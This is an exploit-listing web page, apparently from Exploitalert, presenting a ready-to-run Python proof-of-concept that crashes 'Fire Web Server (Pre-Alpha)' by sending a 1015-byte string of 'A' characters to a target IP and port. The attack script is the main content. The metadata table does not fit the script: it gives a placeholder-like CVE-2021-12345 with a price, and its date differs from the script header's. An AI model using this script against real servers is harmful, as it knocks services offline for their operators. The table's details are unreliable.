Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-12345 | CWE-400 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Anonymous | High | Remote | 2020-06-29 |
#!/usr/bin/python ''' # Exploit Title: Fire Web Server (Pre-Alpha) - Remote Denial of Service (PoC) # Date: 2020-Jun-26 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/firewebserver/ # Software Link: https://sourceforge.net/projects/firewebserver/files/ # Version: Pre-Alpha # Tested on: Windows 7 , Windows Vista ''' import socket,os,sys if len(sys.argv) < 3: print "Usage: python fwspa_dos.py targetIP targetPort" else: print "[*] Sending evil http request to target" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((sys.argv[1], int(sys.argv[2]))) expl.send("A"*1015) expl.close()
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.